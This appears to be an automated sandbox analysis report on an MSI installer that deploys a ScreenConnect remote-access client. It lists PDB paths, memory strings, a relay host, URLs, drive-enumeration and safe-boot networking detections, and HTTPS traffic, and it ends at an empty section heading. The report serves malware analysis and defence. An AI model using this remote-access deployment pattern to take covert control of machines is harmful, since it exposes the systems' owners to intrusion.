Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdbU! source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2940444279.0000000002100000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2940786358.0000000002381000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2940588071.0000000002182000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.ClientService.dll.1.dr
Source:	Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: rundll32.exe, 00000003.00000003.1697090286.000000000487E000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2943982681.000000001B052000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll.3.dr
Source:	Binary string: \??\C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Core.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2948001083.000000000550A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2940444279.0000000002100000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2940786358.0000000002381000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2940588071.0000000002182000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.ClientService.dll.1.dr
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000006.00000000.1723474974.0000000000EAD000.00000002.00000001.01000000.0000000A.sdmp, ScreenConnect.ClientService.exe.1.dr
Source:	Binary string: mscorlib.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2948001083.000000000553C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: rundll32.exe, 00000003.00000003.1697090286.0000000004801000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2945335092.000000001B292000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.Windows.dll.3.dr, ScreenConnect.Windows.dll.1.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000003.00000003.1697090286.0000000004872000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.3.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb/[ source: rundll32.exe, 00000003.00000003.1697090286.0000000004801000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2945335092.000000001B292000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.Windows.dll.3.dr, ScreenConnect.Windows.dll.1.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2939627103.000000000131B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: INSPECAO-B01S.msi, MSI15E7.tmp.1.dr, MSI1608.tmp.1.dr, MSI17AE.tmp.1.dr, 4c1434.msi.1.dr, 4c1432.msi.1.dr, 4c1433.rbs.1.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000003.00000003.1697090286.0000000004801000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.3.dr
Source:	Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000007.00000000.1732916566.0000000000042000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.WindowsClient.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.3.dr
Source:	Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: INSPECAO-B01S.msi, MSIBC6.tmp.0.dr, 4c1434.msi.1.dr, 4c1432.msi.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2948001083.000000000553C000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2940504221.0000000002142000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Client.dll.1.dr
Source:	Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.1.dr

Checks for available system drives (often done to infect USB drives)

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Networking

Enables network access during safeboot for specific services

Source: C:\Windows\System32\msiexec.exe

Registry value created: NULL Service

Jump to behavior

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: instance-xkznvd-relay.screenconnect.com

Source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: svchost.exe, 00000008.00000002.2942134728.0000017F9328D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: svchost.exe, 00000008.00000003.1757539471.0000017F93048000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: edb.log.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: edb.log.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000008.00000003.1757539471.0000017F93048000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000008.00000003.1757539471.0000017F93048000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000008.00000003.1757539471.0000017F9307D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.8.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2939627103.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://instance-xkznvd-relay.screenconnect.com:443/
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2939627103.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://instance-xkznvd-relay.screenconnect.com:443/8
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2939627103.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://instance-xkznvd-relay.screenconnect.com:443/V
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2940900187.0000000002397000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000006.00000002.2940900187.0000000002466000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000006.00000002.2940900187.00000000022C6000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000006.00000002.2940900187.00000000020CE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000006.00000002.2940900187.000000000237D000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000006.00000002.2940900187.0000000002178000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000006.00000002.2940900187.0000000002234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://instance-xkznvd-relay.screenconnect.com:443/d
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2939627103.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://instance-xkznvd-relay.screenconnect.com:443/l
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2939627103.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://instance-xkznvd-relay.screenconnect.com:443/r
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2940900187.0000000002002000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: rundll32.exe, 00000003.00000003.1697090286.0000000004801000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1697090286.0000000004872000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.3.dr, Microsoft.Deployment.WindowsInstaller.dll.3.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.3.dr, Microsoft.Deployment.Compression.dll.3.dr	String found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
Source: rundll32.exe, 00000003.00000003.1697090286.0000000004801000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1697090286.0000000004872000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.3.dr, Microsoft.Deployment.WindowsInstaller.dll.3.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.3.dr, Microsoft.Deployment.Compression.dll.3.dr	String found in binary or memory: http://wixtoolset.org/news/
Source: rundll32.exe, 00000003.00000003.1697090286.0000000004801000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1697090286.0000000004872000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.3.dr, Microsoft.Deployment.WindowsInstaller.dll.3.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.3.dr, Microsoft.Deployment.Compression.dll.3.dr	String found in binary or memory: http://wixtoolset.org/releases/
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: ScreenConnect.WindowsCredentialProvider.dll.1.dr	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: ScreenConnect.Core.dll.3.dr	String found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
Source: svchost.exe, 00000008.00000003.1757539471.0000017F930F2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.dr	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.8.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.8.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.8.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000008.00000003.1757539471.0000017F930F2000.00000004.00000800.00020000.00000000.sdmp, edb.log.8.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: svchost.exe, 00000008.00000003.1757539471.0000017F930F2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.8.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Spam, unwanted Advertisements and Ransom Demands

